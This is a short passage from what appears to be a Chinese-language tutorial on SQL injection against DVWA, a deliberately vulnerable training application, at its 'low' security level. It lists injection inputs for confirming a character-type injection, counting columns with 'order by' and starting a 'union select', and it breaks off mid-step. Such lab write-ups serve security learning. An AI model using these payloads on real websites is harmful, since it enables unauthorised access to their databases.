DVWA之low級別SQL Injection

輸入1,返回正常,輸入1‘ and ’1‘=’2,返回空,輸入1‘ or 1234=1234 # 說明存在字符型注入。 然後猜解字段數,輸入1‘ order by 1 #,返回正常,輸入1’ order by 2 #,返回正常 輸入1‘ order by 3 #,報錯,說明只有兩個字段,即First name、Surname。 確定顯示的字段順序 輸入1′ union select 1,2 #,查
相關文章
相關標籤/搜索